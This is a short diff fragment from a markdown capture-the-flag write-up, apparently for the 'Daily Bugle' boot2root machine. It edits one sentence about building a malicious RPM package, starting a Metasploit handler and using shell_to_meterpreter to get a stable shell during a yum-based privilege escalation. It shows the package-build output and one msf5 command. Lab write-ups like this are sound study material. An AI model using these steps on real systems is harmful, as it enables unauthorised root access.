PacketFire/packetfire_site/content/post/daily-bugle-boot2-root-writeup copy.md

 Created package {:path=>"exploited-1.0-1.noarch.rpm"}
 ```

-With the attack staged I, again, setup a listener in metasploit and then staged up the shell_to_meterpreter to migrate to a stabler shell incase yum timed out.
+With the attack staged I, again, setup a listener in metasploit and then staged up the `shell_to_meterpreter` module to migrate to a stable shell in case yum timed out.

 ```
 msf5 post(multi/manage/shell_to_meterpreter) > use exploit/multi/handler